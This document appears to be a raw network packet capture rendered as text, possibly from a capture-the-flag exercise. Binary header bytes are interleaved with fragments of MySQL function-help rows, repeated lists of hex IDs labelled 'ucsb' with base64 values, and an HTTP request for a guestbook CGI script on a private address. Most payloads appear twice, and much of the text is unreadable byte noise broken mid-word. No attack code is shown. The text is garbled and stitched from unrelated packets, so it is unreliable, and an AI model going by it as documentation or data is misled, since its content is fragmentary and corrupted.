bb0`BiET@/Ԁo0SE< @@KW  3PWɟtڀ f X)3imals. If D\nis 0, the result has no decimal point or fractional part.\nD can be negative to truncate (make zero) D digits left of the\ndecimal point of the value X.\n','mysql> SELECT TRUNCATE(1.223,1);\n -> 1.2\nmysql> SELECT TRUNCATE(1.999,1);\n -> 1.9\nmysql> SELECT TRUNCATE(1.999,0);\n -> 1\nmysql> SELECT TRUNCATE(-1.999,1);\n -> -1.9\nmysql> SELECT TRUNCATE(122,-2);\n -> 100',''),(271,'TIMESTAMPADD',14,' TIMESTAMPADD(interval,int_expr,datetime_expr)\n\nAdds the integer expression int_expr to the date or datetime expression\ndatetime_expr. The unit for int_expr is given by the\ninterval argument, which should be one of the following values:\nFRAC_SECOND,\nSECOND,\nMINUTE,\nHOUR,\nDAY,\nWEEK,\nMONTH,\nQUARTER,\nor\nYEAR.\n\nThe interval value may be specified using one of keywords as shown,\nor with a prefix of SQL_TSI_. For example, DAY or\nSQL_TSI_DAY both are legal.\n','',''),(272,'SHOW',6,'\nSHOW has many forms that provide information about databases,\ntables, columns, or status information about the server.\nThis section describes those following:\n\nSHOW [FULL] COLUMNS FROM tbl_name [FROM db_name] [LIKE \'pattern\']\nSHOW CREATE DATABASE db_name\nSHOW CREATE TABLE tbl_name\nSHOW DATABASES [LIKE \'pattern\']\nSHOW ENGINE eCx bbBi0`ET@/,|po0E< #@?  P2 ?  Td9
249A48906FF5FD48353AA46F6129351F,ucsb,MTNzEwEDAfq3IRjzbASffpeaXVAzTwAorSJL+Q==
35C2F463E691F74940546FDFFB934C81,ucsb,MTNzEwEDAftMXrnzkkIkkYgQL5ouVKGgmMkXGg==
11EECF77A9470A3236D7659C379BBE5D,ucsb,MTNzEwEDAfz2578vU3Y4nDodEaWP5MrVZJhqpg==
156330D8E3AC209CD6BF904EF517137A,ucsb,MTNzEwEDAf0iDP3ciU2OFXYEeQEGwcV/OFGoWg==
88B421ECB050078FEF2BCD4E217159EF,ucsb,MTNzEwEDAf6Q84sMZvu1tZ888NiJxXvFisdL6A==
54F5C6575A1C59939AC9AF089C0631B7,ucsb,MTNzEwEDAf+W8P2CSsJhC3emxWw6UGEIR47lPw==
8F1FA29C3E4C5C3582CD09DE4669BC50,ucsb,MTNzEwEDAgCsOIzQM5WY8hz0Jgx5J3NhFFDYPQ==
B82B86B33CFADF466A6819CCFEDA25D4,ucsb,MTNzEwEDAgEFejyLyFkyF1z9pv+NpE/sV89e6g==
9AD456BAD6976B1EDDDA6839A8FD1252,ucsb,MTNzEwEDAgKJiBGd6vIdzw30nGIyo/nb1uvLBg==
C5067292621E81A3C5967A4340F0BCC4,ucsb,MTNzEwEDAgNXtfjqMRiphwF3u1PnoHvaNMUgEQ==
03F65A6D459E755F2054C0F5C8315BF2,ucsb,MTNzEwEDAgRbiEYRO8Yi9ZAdu7EaJyq//LdQqw==
9B5C76529EF859396A1575B85CF06DF7,ucsb,MTNzEwEDAgVZIj2LMTTwzSbnPuQux2jdDJ4Xlw==
23FF874D6AB8BF314D370C05F8A4FD8B,ucsb,MTNzEwEDAgYwDnMtT9ShN8OhlMQ2hitHzF+ZZg==
7BBEE6487B421129DD516684B02C8860,ucsb,MTNzEwEDAgdzkRJHhuQ0kAribl3W53UIONI0OA==
FAA4F9684EA4F0221DF32FB50EF9CD53,ucsb,MTNzEwEDAgiYOBmKw2mdbEZI3ew3JhN4WuH9ZA==
AB30EF05E38F9EC499DDBA4B06EC8F66,ucsb,C bb0`BiET@/o0AE< #@@  P2 ?  Td9
249A48906FF5FD48353AA46F6129351F,ucsb,MTNzEwEDAfq3IRjzbASffpeaXVAzTwAorSJL+Q==
35C2F463E691F74940546FDFFB934C81,ucsb,MTNzEwEDAftMXrnzkkIkkYgQL5ouVKGgmMkXGg==
11EECF77A9470A3236D7659C379BBE5D,ucsb,MTNzEwEDAfz2578vU3Y4nDodEaWP5MrVZJhqpg==
156330D8E3AC209CD6BF904EF517137A,ucsb,MTNzEwEDAf0iDP3ciU2OFXYEeQEGwcV/OFGoWg==
88B421ECB050078FEF2BCD4E217159EF,ucsb,MTNzEwEDAf6Q84sMZvu1tZ888NiJxXvFisdL6A==
54F5C6575A1C59939AC9AF089C0631B7,ucsb,MTNzEwEDAf+W8P2CSsJhC3emxWw6UGEIR47lPw==
8F1FA29C3E4C5C3582CD09DE4669BC50,ucsb,MTNzEwEDAgCsOIzQM5WY8hz0Jgx5J3NhFFDYPQ==
B82B86B33CFADF466A6819CCFEDA25D4,ucsb,MTNzEwEDAgEFejyLyFkyF1z9pv+NpE/sV89e6g==
9AD456BAD6976B1EDDDA6839A8FD1252,ucsb,MTNzEwEDAgKJiBGd6vIdzw30nGIyo/nb1uvLBg==
C5067292621E81A3C5967A4340F0BCC4,ucsb,MTNzEwEDAgNXtfjqMRiphwF3u1PnoHvaNMUgEQ==
03F65A6D459E755F2054C0F5C8315BF2,ucsb,MTNzEwEDAgRbiEYRO8Yi9ZAdu7EaJyq//LdQqw==
9B5C76529EF859396A1575B85CF06DF7,ucsb,MTNzEwEDAgVZIj2LMTTwzSbnPuQux2jdDJ4Xlw==
23FF874D6AB8BF314D370C05F8A4FD8B,ucsb,MTNzEwEDAgYwDnMtT9ShN8OhlMQ2hitHzF+ZZg==
7BBEE6487B421129DD516684B02C8860,ucsb,MTNzEwEDAgdzkRJHhuQ0kAribl3W53UIONI0OA==
FAA4F9684EA4F0221DF32FB50EF9CD53,ucsb,MTNzEwEDAgiYOBmKw2mdbEZI3ew3JhN4WuH9ZA==
AB30EF05E38F9EC499DDBA4B06EC8F66,ucsb,C Bi0`E@/o+Po0E&e@?  PVGP6* `tGaGThe entire entry was 9146776D63EC3970F727407E1AFBEAA5,ucsb,MTNzEwEDA3AwSAA9uuDv2UnqLdt527AWc6m+hA== at index 1143 C 0`BiE@/Zo0SE&e@@  PVGP6* `tGaGThe entire entry was 9146776D63EC3970F727407E1AFBEAA5,ucsb,MTNzEwEDA3AwSAA9uuDv2UnqLdt527AWc6m+hA== at index 1143 C^ bbBi0`ET@/,|po0E< $@?  P2? ו Ud:MTNzEwEDAgnG717Ljz8QIjrSSzydJYzLQFIL7g==
A03D666E63DD16D14704C0D45DF66BD9,ucsb,MTNzEwEDAgoJp2ma6wGd07ztK9zUcHCiO6FzTw==
71E1230395240BEFEDB2524B075EF78C,ucsb,MTNzEwEDAgte3AJv+jKz2lWLPf3Bn8K+UktjDA==
3C96296B61C82C596ADACE64DE8A18E1,ucsb,MTNzEwEDAgwkt+fkP+ts4uGSkV8wTSRa+YLhSw==
825B9C9C3E9D36615CD3D230464E11AE,ucsb,MTNzEwEDAg3OsUiIuFDx72YXOsWKwXRfcT9Mtg==
3123AEDA286EAA011489EC8C5821F446,ucsb,MTNzEwEDAg5j814QuALdUeeJAyd9EwtvhvyELg==
38B8322EE9AFAB4AD4FD52CC9BE31962,ucsb,MTNzEwEDAg/Pj5GG+LQGxspIscho/eNtXLvW8A==
2855DD3F42DAAF107AECC2558A2441D2,ucsb,MTNzEwEDAhBduu2otUVQoWo04FE5G4bzHYXWMw==
B3C81E732E4B5B6D247D33D16D045D43,ucsb,MTNzEwEDAhHfIZgstYbga7U9mp7HacRqnW8ENA==
7C79FCE8BBB25895F87D95A7F6844FA6,ucsb,MTNzEwEDAhLSKw/68if8OdE1A0BUVA2LKgJu3w==
98E2A8E31066C4971B539E4575700652,ucsb,MTNzEwEDAhMCOfynYf058gD18NubgR9H+Nezgw==
972AFF4ABE714B3F07A5643E0D62BAA8,ucsb,MTNzEwEDAhQPI4c0lLgXp9njKLwgRq6e5XEyLA==
19D7DD3B090657C8FB51DB854A89D3BD,ucsb,MTNzEwEDAhUEQGLt0v0fCZn8ikemm8Y6h8rIxg==
EB9D512521085E68309A9E7ED1D79688,ucsb,MTNzEwEDAhaR6whaU6Y8Aa0V4C8pb9xXQ5Up4A==
2F709B94BFC4F82F64344EDF2EA752EE,ucsb,MTNzEwEDAhfV6s9N5vPsjLaiguKYA/3HASU5Xg==
1AC566F4BDE1590095BA2D6362B050A5,ucsb,MTNzEwEDAhhr7XhC40jLHRuY1K45iBk3W+v8Sg== A03D666E63DD16D14704C0D45DF66BD9,ucsb,MTNzEwEDAgoJp2ma6wGd07ztK9zUcHCiO6FzTw==
71E1230395240BEFEDB2524B075EF78C,ucsb,MTNzEwEDAgte3AJv+jKz2lWLPf3Bn8K+UktjDA==
3C96296B61C82C596ADACE64DE8A18E1,ucsb,MTNzEwEDAgwkt+fkP+ts4uGSkV8wTSRa+YLhSw==
825B9C9C3E9D36615CD3D230464E11AE,ucsb,MTNzEwEDAg3OsUiIuFDx72YXOsWKwXRfcT9Mtg==
3123AEDA286EAA011489EC8C5821F446,ucsb,MTNzEwEDAg5j814QuALdUeeJAyd9EwtvhvyELg==
38B8322EE9AFAB4AD4FD52CC9BE31962,ucsb,MTNzEwEDAg/Pj5GG+LQGxspIscho/eNtXLvW8A==
2855DD3F42DAAF107AECC2558A2441D2,ucsb,MTNzEwEDAhBduu2otUVQoWo04FE5G4bzHYXWMw==
B3C81E732E4B5B6D247D33D16D045D43,ucsb,MTNzEwEDAhHfIZgstYbga7U9mp7HacRqnW8ENA==
7C79FCE8BBB25895F87D95A7F6844FA6,ucsb,MTNzEwEDAhLSKw/68if8OdE1A0BUVA2LKgJu3w==
98E2A8E31066C4971B539E4575700652,ucsb,MTNzEwEDAhMCOfynYf058gD18NubgR9H+Nezgw==
972AFF4ABE714B3F07A5643E0D62BAA8,ucsb,MTNzEwEDAhQPI4c0lLgXp9njKLwgRq6e5XEyLA==
19D7DD3B090657C8FB51DB854A89D3BD,ucsb,MTNzEwEDAhUEQGLt0v0fCZn8ikemm8Y6h8rIxg==
EB9D512521085E68309A9E7ED1D79688,ucsb,MTNzEwEDAhaR6whaU6Y8Aa0V4C8pb9xXQ5Up4A==
2F709B94BFC4F82F64344EDF2EA752EE,ucsb,MTNzEwEDAhfV6s9N5vPsjLaiguKYA/3HASU5Xg==
1AC566F4BDE1590095BA2D6362B050A5,ucsb,MTNzEwEDAhhr7XhC40jLHRuY1K45iBk3W+v8Sg== SELECT GREATEST(2,0);\n -> 2\nmysql> SELECT GREATEST(34.0,3.0,5.0,767.0);\n -> 767.C bb0`BiET@/Ԁo0SE SELECT GREATEST(2,0);\n -> 2\nmysql> SELECT GREATEST(34.0,3.0,5.0,767.0);\n -> 767.C> bbBi0`ET@/p܂Ao0E<"@?LU  3PWٟtڀ  [)30\nmysql> SELECT GREATEST(\'B\',\'A\',\'C\');\n -> \'C\'',''),(274,'OCTETLENGTH',23,' OCTET_LENGTH(str)\n\nOCTET_LENGTH() is a synonym for LENGTH().\n','',''),(275,'SECOND',14,' SECOND(time)\nReturns the second for time, in the range 0 to 59.\n','mysql> SELECT SECOND(\'10:05:03\');\n -> 3',''),(276,'BIT_AND',12,' BIT_AND(expr)\nReturns the bitwise AND of all bits in expr. The calculation is\nperformed with 64-bit (BIGINT) precision.\n','mysql> SELECT order.custid, customer.name, MAX(payments)\n -> FROM order,customer\n -> WHERE order.custid = customer.custid\n -> GROUP BY order.custid;',''),(277,'ATAN2',4,' ATAN(Y,X)\n ATAN2(Y,X)\nReturns the arc tangent of the two variables X and Y. It is\nsimilar to calculating the arc tangent of Y / X, except that the\nsigns of both arguments are used to determine the quadrant of the\nresult.\n','mysql> SELECT ATAN(-2,2);\n -> -0.785398\nmysql> SELECT ATAN2(PI(),0);\n -> 1.570796',''),(278,'MBRCONTAINS',8,' MBRContains(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangle of\ng1 contains the Minimum Bounding Rectangle of g2.\n','mysql> SET @g1 = GeomFromText(\'Polygon((0 0,0 3,3 3,3 0,0 0))\');\nmysql> SET @g2 = GeomFromText(\'Point(1 1CQ bb0`BiET@/Ԁo0SE<"@@KU  3PWٟtڀ  [)30\nmysql> SELECT GREATEST(\'B\',\'A\',\'C\');\n -> \'C\'',''),(274,'OCTETLENGTH',23,' OCTET_LENGTH(str)\n\nOCTET_LENGTH() is a synonym for LENGTH().\n','',''),(275,'SECOND',14,' SECOND(time)\nReturns the second for time, in the range 0 to 59.\n','mysql> SELECT SECOND(\'10:05:03\');\n -> 3',''),(276,'BIT_AND',12,' BIT_AND(expr)\nReturns the bitwise AND of all bits in expr. The calculation is\nperformed with 64-bit (BIGINT) precision.\n','mysql> SELECT order.custid, customer.name, MAX(payments)\n -> FROM order,customer\n -> WHERE order.custid = customer.custid\n -> GROUP BY order.custid;',''),(277,'ATAN2',4,' ATAN(Y,X)\n ATAN2(Y,X)\nReturns the arc tangent of the two variables X and Y. It is\nsimilar to calculating the arc tangent of Y / X, except that the\nsigns of both arguments are used to determine the quadrant of the\nresult.\n','mysql> SELECT ATAN(-2,2);\n -> -0.785398\nmysql> SELECT ATAN2(PI(),0);\n -> 1.570796',''),(278,'MBRCONTAINS',8,' MBRContains(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangle of\ng1 contains the Minimum Bounding Rectangle of g2.\n','mysql> SET @g1 = GeomFromText(\'Polygon((0 0,0 3,3 3,3 0,0 0))\');\nmysql> SET @g2 = GeomFromText(\'Point(1 1C bbBi0`ET@/,|po0E< %@?  P2? "# Wd;R>A97C72ABD43887C14E4D18CC500621F2,ucsb,MTNzEwEDAhmPD8W3do0kk7yhVHdJrRejL/0E6A==
17CEA9419B05C06F7BAF15972CE6BD4A,ucsb,MTNzEwEDAhrmLSSyXPFcMCNuOSy98LrlgjzxXw==
051A2D96DB8B5B72CA6A51942F4F9D8A,ucsb,MTNzEwEDAhs8wtBvG5MKsfy0ZBGwkvQQRXTOug==
B7197C57CBADCE414AC0DF9E8FF55B26,ucsb,MTNzEwEDAhyyZoIpMKnKL1QVqhF4TBMnGPJDow==
2588CB06B13DB19D5A4B06EA05782F8C,ucsb,MTNzEwEDAh10gb/OCSUTJsvXEVU9GSrs1BW95A==
FE0B0BDFCA7DF541F0D7D9E47FE6002F,ucsb,MTNzEwEDAh7dxNXZGPnZ2Aob8mLlfO/z7lzWCQ==
2014D3D1056DCD8C59B10076CA7E9E7E,ucsb,MTNzEwEDAh9KSA5wu2tr/WAv9TBD2ld4a/fJQw==
9E9D727F1FDE133CC945651922EB0063,ucsb,MTNzEwEDAiCy2waETKumds1qKZK9qE+MNBj9cQ==
E045E74F4BAD9B8C55AE8B93D1B41D23,ucsb,MTNzEwEDAiHNDAmymI2mTUxj+PUInWMI9E9+ww==
C44D6DC7F518C4B8EF1EF322DD5C5D5F,ucsb,MTNzEwEDAiJWSOJO5VizoUB7iPusxdVnEmcDjA==
FDD3333E0B7EBAE1D10148F875835D02,ucsb,MTNzEwEDAiPfkNNQ0oeJqQ4I7GgGXkQ24SfT8Q==
96013FFB44FFFD4495DC469D588A8A44,ucsb,MTNzEwEDAiQm4dHqRr6AoNAOVuby8zR+CNu/wQ==
FE1B8FB7AA35F3E092F61E667B5F35A1,ucsb,MTNzEwEDAiUrZvQf9G1mxJViatLdEjQ7241yig==
6EAA6F60DA44140B0C06A4E018FA1B86,ucsb,MTNzEwEDAibLoQe4BosVOrxGMRtLnqeLGhBnRw==
BF24DE6D152FF3697D16737C2B3D2326,ucsb,MTNzEwEDAifQCMdDJKp+HKaFw8Tv6DhCRU2gtg==
8D8F1F6524EA16582EE78A1659EB0CA7,ucsb,MTNC ZZBi0`EL@/܂Sŀo0E4F@?9 3 PV'tc )CC ZZBi0`EL@/܂Sŀo0E4@?sj 3 ;PDv0 )CyCѕ bb0`BiET@/o0AE< %@@  P2? "# Wd;R>A97C72ABD43887C14E4D18CC500621F2,ucsb,MTNzEwEDAhmPD8W3do0kk7yhVHdJrRejL/0E6A==
17CEA9419B05C06F7BAF15972CE6BD4A,ucsb,MTNzEwEDAhrmLSSyXPFcMCNuOSy98LrlgjzxXw==
051A2D96DB8B5B72CA6A51942F4F9D8A,ucsb,MTNzEwEDAhs8wtBvG5MKsfy0ZBGwkvQQRXTOug==
B7197C57CBADCE414AC0DF9E8FF55B26,ucsb,MTNzEwEDAhyyZoIpMKnKL1QVqhF4TBMnGPJDow==
2588CB06B13DB19D5A4B06EA05782F8C,ucsb,MTNzEwEDAh10gb/OCSUTJsvXEVU9GSrs1BW95A==
FE0B0BDFCA7DF541F0D7D9E47FE6002F,ucsb,MTNzEwEDAh7dxNXZGPnZ2Aob8mLlfO/z7lzWCQ==
2014D3D1056DCD8C59B10076CA7E9E7E,ucsb,MTNzEwEDAh9KSA5wu2tr/WAv9TBD2ld4a/fJQw==
9E9D727F1FDE133CC945651922EB0063,ucsb,MTNzEwEDAiCy2waETKumds1qKZK9qE+MNBj9cQ==
E045E74F4BAD9B8C55AE8B93D1B41D23,ucsb,MTNzEwEDAiHNDAmymI2mTUxj+PUInWMI9E9+ww==
C44D6DC7F518C4B8EF1EF322DD5C5D5F,ucsb,MTNzEwEDAiJWSOJO5VizoUB7iPusxdVnEmcDjA==
FDD3333E0B7EBAE1D10148F875835D02,ucsb,MTNzEwEDAiPfkNNQ0oeJqQ4I7GgGXkQ24SfT8Q==
96013FFB44FFFD4495DC469D588A8A44,ucsb,MTNzEwEDAiQm4dHqRr6AoNAOVuby8zR+CNu/wQ==
FE1B8FB7AA35F3E092F61E667B5F35A1,ucsb,MTNzEwEDAiUrZvQf9G1mxJViatLdEjQ7241yig==
6EAA6F60DA44140B0C06A4E018FA1B86,ucsb,MTNzEwEDAibLoQe4BosVOrxGMRtLnqeLGhBnRw==
BF24DE6D152FF3697D16737C2B3D2326,ucsb,MTNzEwEDAifQCMdDJKp+HKaFw8Tv6DhCRU2gtg==
8D8F1F6524EA16582EE78A1659EB0CA7,ucsb,MTNCܕ ZZ0`BiEL@/go0AE4F@@9 3 PV'tc )CC ZZ0`BiEL@/Eo0lE4@@rj 3 ;PDv0 )CyC bbBi0`ET@/,|po0E< &@?  P2"?  Xd=zEwEDAigIKvUyVPQ9ncQgFBm4EO9c1UrYxA==
FCE3AADD527673689F744BEC29F9EDC2,ucsb,MTNzEwEDAinTzuz1DfTWvhy8IVnnER//PRc63A==
1BD266F019FFF93B281691995233B6FD,ucsb,MTNzEwEDAipIRyZ9VYuR+EvHjbl+FHBQfWrmig==
D2FE44C7B170BA967683A2F0F6379991,ucsb,MTNzEwEDAiuOVGAn/Jq3fIW+/XRoLvXogkNxDQ==
E587152DC4B44696B7FB6573B238F77E,ucsb,MTNzEwEDAiyiIoUfv3X4gSAZxF1FosytKYgO4Q==
96C3834DA59091751FAE8BA730E774D2,ucsb,MTNzEwEDAi3Gx8zBiIb1pMMWwV+jFu9/w5mylw==
41253B63E17A716A17B4C2333CCDD9B2,ucsb,MTNzEwEDAi6G+MB/l8KiC5PgRwL2l7ih5g2IlA==
79238FB32FE5827EA30322C1546E7CD9,ucsb,MTNzEwEDAi9Zd5IRbl6RYwfj+iW8pjdXQjvVdw==
6961771D51BA3B399630D5FDCD4BA967,ucsb,MTNzEwEDAjAYRRcha6VyOAIuE2NI1jTyUySpDg==
4CD20F92675D91CC55C47D8EED60E0F1,ucsb,MTNzEwEDAjFqoOk4Zmuhg1xHghjGCtiW01DVdw==
41AAE8A006D431BFDC19D80C8EFD5598,ucsb,MTNzEwEDAjIjwJ+Qn/kaY6Ah4ZXp0VzkBYyglw==
10B26134CBDD0416EF6076EF35FB3C11,ucsb,MTNzEwEDAjOj6TrUv9bDUPUze7hBEQuPGuLKTA==
0CB505A6D466EC01A69CBCD08BD3942C,ucsb,MTNzEwEDAjRrc+8gdQTU2xqJMyf3/LGWvt1l7g==
56EE1EC0B5867C789041194872A291F5,ucsb,MTNzEwEDAjUmfmV1bWpzQ2zS76UfHbE7098JXA==
9AFBCE292C30BBEE0AC1C3CBE3BD2CFF,ucsb,MTNzEwEDAjYNbQjST242wrzXpJe99WQGi10Hug==
0F15704822B7B212CC71292758C320C8,ucsb,MTNzEwEDAjeXOZLOVloZ4+tq9Kz0n4TgwkGOeA==
DC bb0`BiET@/o0AE< &@@  P2"?  Xd=zEwEDAigIKvUyVPQ9ncQgFBm4EO9c1UrYxA==
FCE3AADD527673689F744BEC29F9EDC2,ucsb,MTNzEwEDAinTzuz1DfTWvhy8IVnnER//PRc63A==
1BD266F019FFF93B281691995233B6FD,ucsb,MTNzEwEDAipIRyZ9VYuR+EvHjbl+FHBQfWrmig==
D2FE44C7B170BA967683A2F0F6379991,ucsb,MTNzEwEDAiuOVGAn/Jq3fIW+/XRoLvXogkNxDQ==
E587152DC4B44696B7FB6573B238F77E,ucsb,MTNzEwEDAiyiIoUfv3X4gSAZxF1FosytKYgO4Q==
96C3834DA59091751FAE8BA730E774D2,ucsb,MTNzEwEDAi3Gx8zBiIb1pMMWwV+jFu9/w5mylw==
41253B63E17A716A17B4C2333CCDD9B2,ucsb,MTNzEwEDAi6G+MB/l8KiC5PgRwL2l7ih5g2IlA==
79238FB32FE5827EA30322C1546E7CD9,ucsb,MTNzEwEDAi9Zd5IRbl6RYwfj+iW8pjdXQjvVdw==
6961771D51BA3B399630D5FDCD4BA967,ucsb,MTNzEwEDAjAYRRcha6VyOAIuE2NI1jTyUySpDg==
4CD20F92675D91CC55C47D8EED60E0F1,ucsb,MTNzEwEDAjFqoOk4Zmuhg1xHghjGCtiW01DVdw==
41AAE8A006D431BFDC19D80C8EFD5598,ucsb,MTNzEwEDAjIjwJ+Qn/kaY6Ah4ZXp0VzkBYyglw==
10B26134CBDD0416EF6076EF35FB3C11,ucsb,MTNzEwEDAjOj6TrUv9bDUPUze7hBEQuPGuLKTA==
0CB505A6D466EC01A69CBCD08BD3942C,ucsb,MTNzEwEDAjRrc+8gdQTU2xqJMyf3/LGWvt1l7g==
56EE1EC0B5867C789041194872A291F5,ucsb,MTNzEwEDAjUmfmV1bWpzQ2zS76UfHbE7098JXA==
9AFBCE292C30BBEE0AC1C3CBE3BD2CFF,ucsb,MTNzEwEDAjYNbQjST242wrzXpJe99WQGi10Hug==
0F15704822B7B212CC71292758C320C8,ucsb,MTNzEwEDAjeXOZLOVloZ4+tq9Kz0n4TgwkGOeA==
DC bbBi0`ET@/p܂Ao0E<#@?LT  3PWtڀ k _)4)\');\nmysql> SELECT MBRContains(@g1,@g2), MBRContains(@g2,@g1);\n----------------------+----------------------+\n| MBRContains(@g1,@g2) | MBRContains(@g2,@g1) |\n+----------------------+----------------------+\n| 1 | 0 |\n+----------------------+----------------------+',''),(279,'HOUR',14,' HOUR(time)\nReturns the hour for time. The range of the return value is\n0 to 23 for time-of-day values.\n','mysql> SELECT HOUR(\'10:05:03\');\n -> 10',''),(280,'TYPE SET',1,' SET(\'value1\',\'value2\',...)\n\nA set. A string object that can have zero or more values, each of which must\nbe chosen from the list of values \'value1\', \'value2\',\n... A SET column can have a maximum of 64 members.\nSET values are represented internally as integers.\n \n','',''),(281,'SELECT',6,'SELECT is used to retrieve rows selected from one or more tables.\nSupport for UNION statements and subqueries is available as of MySQL\n4.0 and 4.1, respectively.\nSee [UNION, , UNION] and [Subqueries].\n\n --- Each select_expr indicates a column you want to retrieve.\n\n --- table_references indicates the table or tables from which to retrieve rows.\nIts syntax is described in [JOIN, , JOIN].\n\n --- where_definition consists of the keyword WHERE followed C& ZZBi0`EL@/$T<o0E4@?A  Pկ8Ov  1T7=wC7 bb0`BiET@/Ԁo0SE<#@@KT  3PWtڀ k _)4)\');\nmysql> SELECT MBRContains(@g1,@g2), MBRContains(@g2,@g1);\n----------------------+----------------------+\n| MBRContains(@g1,@g2) | MBRContains(@g2,@g1) |\n+----------------------+----------------------+\n| 1 | 0 |\n+----------------------+----------------------+',''),(279,'HOUR',14,' HOUR(time)\nReturns the hour for time. The range of the return value is\n0 to 23 for time-of-day values.\n','mysql> SELECT HOUR(\'10:05:03\');\n -> 10',''),(280,'TYPE SET',1,' SET(\'value1\',\'value2\',...)\n\nA set. A string object that can have zero or more values, each of which must\nbe chosen from the list of values \'value1\', \'value2\',\n... A SET column can have a maximum of 64 members.\nSET values are represented internally as integers.\n \n','',''),(281,'SELECT',6,'SELECT is used to retrieve rows selected from one or more tables.\nSupport for UNION statements and subqueries is available as of MySQL\n4.0 and 4.1, respectively.\nSee [UNION, , UNION] and [Subqueries].\n\n --- Each select_expr indicates a column you want to retrieve.\n\n --- table_references indicates the table or tables from which to retrieve rows.\nIts syntax is described in [JOIN, , JOIN].\n\n --- where_definition consists of the keyword WHERE followed CD ZZʪBiEL@/o0o0oE4@@A  Pկ8Ov  1T7=wC ZZBi0`EL@/܂Sŀo0E4H@?7 3 P`'tS )CC bbBi0`ET@/$L<o0E<@?%  PձʮLۣ 1T7=wC+ ZZ0`BiEL@/go0AE4H@@7 3 P`'tS )CC8 bbʪBiET@/o0o0oE<@@%  PձʮLۣ 1T7=wC ZZBiʪEL@/o0oo0E4@@ կPOv8 4 7=xV1TC ZZ0`BiEL@/To0<E4@@  կPOv8  7=xV1TC bbBi0`ET@/p܂Ao0E<$@?LS  3PWtڀ u# _)4by\nan expression that indicates the condition or conditions that rows\nmust satisfy to be selected.\n\n\nSELECT can also be used to retrieve rows computed without reference to\nany table.\n','SELECT\n [ALL | DISTINCT | DISTINCTROW ]\n [HIGH_PRIORITY]\n [STRAIGHT_JOIN]\n [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]\n [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]\n select_expr, ...\n [INTO OUTFILE \'file_name\' export_options\n | INTO DUMPFILE \'file_name\']\n [FROM table_references\n [WHERE where_definition]\n [GROUP BY {col_name | expr | position}\n [ASC | DESC], ... [WITH ROLLUP]]\n [HAVING where_definition]\n [ORDER BY {col_name | expr | position}\n [ASC | DESC] , ...]\n [LIMIT {[offset,] row_count | row_count OFFSET offset}]\n [PROCEDURE procedure_name(argument_list)]\n [FOR UPDATE | LOCK IN SHARE MODE]]',''),(282,'COT',4,' COT(X)\nReturns the cotangent of X.\n','mysql> SELECT COT(12);\n -> -1.57267341\nmysql> SELECT COT(0);\n -> NULL',''),(283,'BACKUP TABLE',7,'Note: This statement is deprecated. We are working on a better\nreplacement for it that will provide online backup capabilities.\nIn the meantime, the mysqlhotcopy script can be used instead.C ZZBiʪEL@/o0oo0E4;@@yu ձPLۣˀ. 7=xV1TC bb0`BiET@/Ԁo0SE<$@@KS  3PWtڀ u# _)4by\nan expression that indicates the condition or conditions that rows\nmust satisfy to be selected.\n\n\nSELECT can also be used to retrieve rows computed without reference to\nany table.\n','SELECT\n [ALL | DISTINCT | DISTINCTROW ]\n [HIGH_PRIORITY]\n [STRAIGHT_JOIN]\n [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]\n [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]\n select_expr, ...\n [INTO OUTFILE \'file_name\' export_options\n | INTO DUMPFILE \'file_name\']\n [FROM table_references\n [WHERE where_definition]\n [GROUP BY {col_name | expr | position}\n [ASC | DESC], ... [WITH ROLLUP]]\n [HAVING where_definition]\n [ORDER BY {col_name | expr | position}\n [ASC | DESC] , ...]\n [LIMIT {[offset,] row_count | row_count OFFSET offset}]\n [PROCEDURE procedure_name(argument_list)]\n [FOR UPDATE | LOCK IN SHARE MODE]]',''),(282,'COT',4,' COT(X)\nReturns the cotangent of X.\n','mysql> SELECT COT(12);\n -> -1.57267341\nmysql> SELECT COT(0);\n -> NULL',''),(283,'BACKUP TABLE',7,'Note: This statement is deprecated. We are working on a better\nreplacement for it that will provide online backup capabilities.\nIn the meantime, the mysqlhotcopy script can be used instead.C ZZ0`BiEL@/To0<E4;@@xV  ձPLۣˀ 7=xV1TC  BiʪE@/eo0oo0E=@@w ձPLۣˀvL 7=xW1TGET /~aqs/cgi-bin/guestbook.py HTTP/1.1 Host: 10.7.1.3 User-Agent: Mozilla/5.0 (X11; U; Linux i686; rv:1.7.3) Gecko/20041001 Firefox/0.10.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://10.7.1.3/ C  0`BiE@/ o0<E=@@v  ձPLۣˀu- 7=xW1TGET /~aqs/cgi-bin/guestbook.py HTTP/1.1 Host: 10.7.1.3 User-Agent: Mozilla/5.0 (X11; U; Linux i686; rv:1.7.3) Gecko/20041001 Firefox/0.10.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://10.7.1.3/ Cm bbBi0`ET@/p܂Ao0E<%@?LR  3PWtڀ ; `)5\n\nBACKUP TABLE copies to the backup directory the minimum number of\ntable files needed to restore the table, after flushing any buffered changes\nto disk. The statement works only for MyISAM tables. It copies the\n*.frm definition and *.MYD data files. The *.MYI\nindex file can be rebuilt from those two files.\nThe directory should be specified as a full pathname.\n','BACKUP TABLE tbl_name [, tbl_name] ... TO \'/path/to/backup/directory\'',''),(284,'LOAD_FILE',23,' LOAD_FILE(file_name)\nReads the file and returns the file contents as a string. The file\nmust be located on the server, you must specify the full pathname to the\nfile, and you must have the FILE privilege. The file must\nbe readable by all and be smaller than max_allowed_packet bytes.\n\nIf the file doesn\'t exist or cannot be read because one of the preceding\nconditions is not satisfied, the function returns NULL.\n','mysql> UPDATE tbl_name\n SET blob_column=LOAD_FILE(\'/tmp/picture\')\n WHERE id=1;',''),(285,'POINTFROMTEXT',3,' 